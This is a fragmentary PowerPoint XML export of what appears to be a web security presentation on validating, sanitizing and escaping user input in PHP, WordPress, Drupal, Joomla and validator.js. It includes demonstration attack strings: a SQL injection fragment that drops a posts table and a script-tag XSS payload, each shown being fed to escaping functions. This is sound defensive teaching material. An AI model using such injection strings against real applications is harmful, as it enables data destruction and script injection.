                  <a:srgbClr val="4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endParaRPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000E6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  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%title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="30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E6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  ", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="797997"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$query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30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5F5035"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="30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A82198E0-3F64-41DA-A339-1BEBAD122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661" y="2749995"/>
            <a:ext cx="7071639" cy="2431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Ayesh\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'; DROP TABLE posts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="32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endParaRPr lang="en-US" altLang="en-US" sz="3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8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16F230-E826-4758-8861-7FC13DEF0EED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="907127" y="2998113"/>
            <a:ext cx="2750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C58B8-5F91-4B85-8CE0-EFE9AEE32C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5025284" y="3009900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09A45D-72E8-4D65-9D88-C2519EA5AC83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9004300" y="3009900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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368439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4720623" y="366068"/>
            <a:ext cx="2750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9673484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CF54C-486F-4819-9AFD-5AA95A71A7D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="1246004"/>
            <a:ext cx="5682966" cy="843630"/>
            <a:chOff x="528320" y="1504299"/>
            <a:chExt cx="5682966" cy="843630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360B5CC-6D1E-46A2-933B-3C31F4E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04299"/>
              <a:ext cx="499452" cy="4994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EFDA-645A-42B5-B424-64BC7E3B5CF7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="2009375"/>
              <a:ext cx="5682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filter_var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FILTER_VALIDATE_EMAIL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BB9D1-C18B-4220-980C-0583706DDFCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="2622302"/>
            <a:ext cx="2877711" cy="813508"/>
            <a:chOff x="528320" y="2752929"/>
            <a:chExt cx="2877711" cy="813508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AA981468-19E2-4AC9-B611-5A03B93F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EE870A-8A59-436D-AB5F-3B65606BC1D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="3227883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is_email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33CB0F-16E0-4DE1-95B3-2F061F4E049B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="4051553"/>
            <a:ext cx="4112023" cy="811215"/>
            <a:chOff x="528320" y="3973730"/>
            <a:chExt cx="4112023" cy="8112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F97687-594F-4D61-9BB7-8F2966E7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6" y="3973730"/>
              <a:ext cx="499452" cy="4994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A283F4-A908-48E3-93DD-A4F2207C76F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="4446391"/>
              <a:ext cx="41120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valid_email_address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0BEA58-63D4-484F-AAB5-D8918A3390DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="5478511"/>
            <a:ext cx="5992346" cy="805315"/>
            <a:chOff x="528320" y="5257606"/>
            <a:chExt cx="5992346" cy="80531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74D04A-9B90-4F18-B41F-9A1B31C1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82BF79-82E3-4B12-B05F-427E9B1C7690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0AE3E1-E2AA-42B0-9E75-B24C6C1AF99A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6914411" y="2898094"/>
            <a:ext cx="4448654" cy="1138844"/>
            <a:chOff x="6914411" y="2898094"/>
            <a:chExt cx="4448654" cy="1138844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8C839F54-0438-42A9-9002-6A08D704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44" y="2898094"/>
              <a:ext cx="482832" cy="5540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7D406B-A66C-4FCD-A5A9-6ADA3BAB3091}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6914411" y="3452163"/>
              <a:ext cx="4448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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>var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validator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require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validator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’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validator</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="808030"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a: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isEmail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foo@bar.com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489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4720623" y="366068"/>
            <a:ext cx="27507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9673484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CF54C-486F-4819-9AFD-5AA95A71A7D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="518160" y="1827450"/>
            <a:ext cx="1643399" cy="843630"/>
            <a:chOff x="528320" y="1504299"/>
            <a:chExt cx="1643399" cy="843630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360B5CC-6D1E-46A2-933B-3C31F4E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04299"/>
              <a:ext cx="499452" cy="4994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EFDA-645A-42B5-B424-64BC7E3B5CF7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="2009375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filter_var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BB9D1-C18B-4220-980C-0583706DDFCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-3453130" y="2491340"/>
            <a:ext cx="2877711" cy="813508"/>
            <a:chOff x="528320" y="2752929"/>
            <a:chExt cx="2877711" cy="813508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AA981468-19E2-4AC9-B611-5A03B93F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EE870A-8A59-436D-AB5F-3B65606BC1D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="3227883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is_email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33CB0F-16E0-4DE1-95B3-2F061F4E049B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-4310380" y="4036938"/>
            <a:ext cx="4112023" cy="811215"/>
            <a:chOff x="528320" y="3973730"/>
            <a:chExt cx="4112023" cy="8112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F97687-594F-4D61-9BB7-8F2966E7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6" y="3973730"/>
              <a:ext cx="499452" cy="4994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A283F4-A908-48E3-93DD-A4F2207C76F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="4446391"/>
              <a:ext cx="41120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valid_email_address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0BEA58-63D4-484F-AAB5-D8918A3390DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-6053588" y="5650246"/>
            <a:ext cx="5992346" cy="805315"/>
            <a:chOff x="528320" y="5257606"/>
            <a:chExt cx="5992346" cy="80531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74D04A-9B90-4F18-B41F-9A1B31C1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82BF79-82E3-4B12-B05F-427E9B1C7690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70AE3E1-E2AA-42B0-9E75-B24C6C1AF99A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6095999" y="1858172"/>
            <a:ext cx="4448654" cy="892623"/>
            <a:chOff x="6914411" y="2898094"/>
            <a:chExt cx="4448654" cy="89262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8C839F54-0438-42A9-9002-6A08D704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44" y="2898094"/>
              <a:ext cx="482832" cy="55406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7D406B-A66C-4FCD-A5A9-6ADA3BAB3091}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6914411" y="3452163"/>
              <a:ext cx="44486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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>var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validator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require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validator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’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EF3199C-2ED8-4279-BA9C-7AE602EBBE4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095999" y="3559479"/>
            <a:ext cx="37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https://github.com/chriso/validator.js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6111E-E17D-4B52-8A23-8C027F500B76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670560" y="3621184"/>
            <a:ext cx="5066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https://php.net/filter_var</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://php.net/manual/en/filter.filters.validate.php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54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CF54C-486F-4819-9AFD-5AA95A71A7D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="1246004"/>
            <a:ext cx="6019597" cy="843630"/>
            <a:chOff x="528320" y="1504299"/>
            <a:chExt cx="6019597" cy="843630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360B5CC-6D1E-46A2-933B-3C31F4E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04299"/>
              <a:ext cx="499452" cy="4994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EFDA-645A-42B5-B424-64BC7E3B5CF7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="2009375"/>
              <a:ext cx="6019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filter_var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‘###foo@bar.com'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FILTER_SANITIZE_EMAIL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BB9D1-C18B-4220-980C-0583706DDFCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="2622302"/>
            <a:ext cx="4336444" cy="813508"/>
            <a:chOff x="528320" y="2752929"/>
            <a:chExt cx="4336444" cy="813508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AA981468-19E2-4AC9-B611-5A03B93F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EE870A-8A59-436D-AB5F-3B65606BC1D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="3227883"/>
              <a:ext cx="4336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sanitize_email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‘     foo@bar.com  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10EC45E-0003-4B1E-8D58-6AAC0835D8B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1216D0-6865-4620-9C6C-FB30057174CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4790192" y="366068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BC3E02-F984-4F8B-BB1D-11CA93E156F1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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59768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F1CF54C-486F-4819-9AFD-5AA95A71A7D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="518160" y="1827450"/>
            <a:ext cx="1643399" cy="843630"/>
            <a:chOff x="528320" y="1504299"/>
            <a:chExt cx="1643399" cy="843630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A360B5CC-6D1E-46A2-933B-3C31F4E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04299"/>
              <a:ext cx="499452" cy="4994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EFDA-645A-42B5-B424-64BC7E3B5CF7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="2009375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filter_var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BB9D1-C18B-4220-980C-0583706DDFCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-3453130" y="2491340"/>
            <a:ext cx="2877711" cy="813508"/>
            <a:chOff x="528320" y="2752929"/>
            <a:chExt cx="2877711" cy="813508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AA981468-19E2-4AC9-B611-5A03B93FD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EE870A-8A59-436D-AB5F-3B65606BC1D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="3227883"/>
              <a:ext cx="28777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is_email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33CB0F-16E0-4DE1-95B3-2F061F4E049B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-4310380" y="4036938"/>
            <a:ext cx="4112023" cy="811215"/>
            <a:chOff x="528320" y="3973730"/>
            <a:chExt cx="4112023" cy="8112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F97687-594F-4D61-9BB7-8F2966E7F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6" y="3973730"/>
              <a:ext cx="499452" cy="49945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A283F4-A908-48E3-93DD-A4F2207C76F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="4446391"/>
              <a:ext cx="41120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valid_email_address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'foo@bar.com'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0BEA58-63D4-484F-AAB5-D8918A3390DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-6053588" y="5650246"/>
            <a:ext cx="5992346" cy="805315"/>
            <a:chOff x="528320" y="5257606"/>
            <a:chExt cx="5992346" cy="80531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74D04A-9B90-4F18-B41F-9A1B31C1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82BF79-82E3-4B12-B05F-427E9B1C7690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B6111E-E17D-4B52-8A23-8C027F500B76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670560" y="3621184"/>
            <a:ext cx="48794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https://php.net/filter_var</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://php.net/manual/tr/filter.filters.sanitize.php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5EC7DA-58EA-4D90-B944-4B7A2C07859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3EEDB3-766F-485E-A202-D36F68B2F842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4790192" y="366068"/>
            <a:ext cx="26116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B705B7-8E33-44A2-AD6D-6E5A4E387C64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11026434" y="596900"/>
            <a:ext cx="1008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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="523076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814D0A-F426-4527-8DF7-8161F17C9949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="1642244"/>
            <a:ext cx="9834744" cy="1089851"/>
            <a:chOff x="528320" y="1504299"/>
            <a:chExt cx="9834744" cy="1089851"/>
          </a:xfrm>
        </p:grpSpPr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A400750F-1BFF-405B-B721-B2BF7E9C2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04299"/>
              <a:ext cx="499452" cy="499452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45BD04-56D2-4A62-9FCD-C3719A9490CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="2009375"/>
              <a:ext cx="98347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filter_var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'test &lt;script&gt;alert("</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0000E6"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xss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");&lt;/script&gt;'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FILTER_SANITIZE_FULL_SPECIAL_CHARS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400000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>htmlspecialchars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'test &lt;script&gt;alert("</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0000E6"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xss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");&lt;/script&gt;'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D0045"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ENT_QUOTES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'UTF-8'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58639F-595C-4F6F-8E10-A1BC82ECFE7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="3018542"/>
            <a:ext cx="5655715" cy="813508"/>
            <a:chOff x="528320" y="2752929"/>
            <a:chExt cx="5655715" cy="813508"/>
          </a:xfrm>
        </p:grpSpPr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BD7DFE1-1C90-495C-B357-796C2C31D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446E85-A401-4B09-9BF3-7D757B13715A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="3227883"/>
              <a:ext cx="56557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esc_html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'test &lt;script&gt;alert("</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0000E6"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xss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");&lt;/script&gt;’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FE5FEC-9F75-411C-B68C-11135A20E988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="4447793"/>
            <a:ext cx="6019597" cy="811215"/>
            <a:chOff x="528320" y="3973730"/>
            <a:chExt cx="6019597" cy="81121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A6E2264-1085-40B6-90C8-E6951D27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6" y="3973730"/>
              <a:ext cx="499452" cy="49945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257E8B-67F8-42B1-9B88-A6852E5E3456}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="4446391"/>
              <a:ext cx="6019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check_plain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'test &lt;script&gt;alert("</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0000E6"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xss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");&lt;/script&gt;'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5E90A-564C-4E8E-A690-C8BC2C1035EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="5874751"/>
            <a:ext cx="5992346" cy="805315"/>
            <a:chOff x="528320" y="5257606"/>
            <a:chExt cx="5992346" cy="80531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058EDF-815A-4ADE-B301-01B68AE8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348597-CECD-4F47-B4EB-BE4922D67576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B0C4D3-0DE7-41C1-A264-880790A1F12C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6914411" y="3294334"/>
            <a:ext cx="4448654" cy="1138844"/>
            <a:chOff x="6914411" y="2898094"/>
            <a:chExt cx="4448654" cy="1138844"/>
          </a:xfrm>
        </p:grpSpPr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E5C422E-94DF-4B41-9093-FE41019D9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44" y="2898094"/>
              <a:ext cx="482832" cy="55406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28BD2AD-6E1D-4DEE-B807-6ADC8A4C512A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6914411" y="3452163"/>
              <a:ext cx="44486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800000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>var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validator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require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validator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’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validator</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="808030"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>isEmail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foo@bar.com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'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9230CAF-9758-4C2D-8A09-B6D156EDE659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5084344" y="1127536"/>
            <a:ext cx="2023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Escape HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="621378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A400750F-1BFF-405B-B721-B2BF7E9C2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642244"/>
            <a:ext cx="499452" cy="49945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9BD7DFE1-1C90-495C-B357-796C2C31D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1" y="3251872"/>
            <a:ext cx="499452" cy="49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A6E2264-1085-40B6-90C8-E6951D270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6" y="4447793"/>
            <a:ext cx="499452" cy="49945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A058EDF-815A-4ADE-B301-01B68AE894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5874751"/>
            <a:ext cx="483406" cy="48340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CE5C422E-94DF-4B41-9093-FE41019D9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9" y="1642044"/>
            <a:ext cx="482832" cy="5540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9230CAF-9758-4C2D-8A09-B6D156EDE659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5084344" y="1127536"/>
            <a:ext cx="20233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Escape HTML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F5BEB6-FEC1-4E4C-A3CB-8FCEEA61ECED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528320" y="2172316"/>
            <a:ext cx="5044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https://php.net/filter_var</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://php.net/manual/en/filter.filters.sanitize.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://php.net/htmlspecialchars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BE0AA-4751-4241-AB17-FB9C7C0C6135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528320" y="3786847"/>
            <a:ext cx="752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https://codex.wordpress.org/Validating_Sanitizing_and_Escaping_User_Data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30898-1F9D-426D-BEDC-D9C61226B6AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528320" y="4977835"/>
            <a:ext cx="1020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https://api.drupal.org/api/drupal/includes%21common.inc/group/sanitization/7.x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://api.drupal.org/api/drupal/core%21includes%21common.inc/group/sanitization/8.6.x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490B63-65CB-4BED-B266-6CE5320E74F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6520666" y="2172316"/>
            <a:ext cx="3710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https://github.com/chriso/validator.js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84A41-8B87-4CD1-BE17-DDDCDF13DCFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528320" y="6358157"/>
            <a:ext cx="882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https://api.joomla.org/cms-3/classes/Joomla.CMS.Filter.InputFilter.html#method_clean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C6DD6-AFE7-44F7-B0D2-B3112B2DA9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2936769" y="1137195"/>
            <a:ext cx="6318461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OWASP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Myriad Pro Light" panose="020B0603030403020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              <a:cs typeface="CordiaUPC" panose="020B05020402040202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8E555-2E80-48E1-BAE2-8614A10AB04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3105834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eb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pplication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ecurity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3B53E-62C5-4CC4-853B-AE865424FDAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
